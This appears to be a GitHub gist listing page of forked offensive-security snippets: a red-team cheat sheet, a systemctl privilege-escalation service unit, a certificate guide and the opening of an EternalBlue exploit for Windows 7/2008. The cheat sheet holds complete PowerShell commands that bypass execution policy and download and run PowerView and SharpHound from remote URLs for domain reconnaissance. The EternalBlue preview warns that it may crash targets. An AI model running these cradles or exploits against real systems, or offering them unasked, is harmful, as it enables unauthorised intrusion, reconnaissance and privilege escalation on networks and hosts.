Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
bahaahassanieh
bahaahassanieh
/ Exploitation.md
Created
November 29, 2023 20:35
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
bahaahassanieh
/ RedTeam_CheatSheet.ps1
Created
February 22, 2022 21:41
— forked from m8sec/RedTeam_CheatSheet.ps1
Red Team CheatSheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
bahaahassanieh
/ Privilege Escalation.md
Created
August 23, 2021 05:33
— forked from A1vinSmith/Privilege Escalation.md
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)
https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
[Unit]
Description=roooooooooot
[Service]
Type=simple
bahaahassanieh
/ self-signed-certificate-with-custom-ca.md
Created
March 30, 2021 04:28
— forked from fntlnz/self-signed-certificate-with-custom-ca.md
Self Signed Certificate with Custom Root CA
bahaahassanieh
/ eternalblue7_exploit.py
Created
February 17, 2018 21:03
— forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |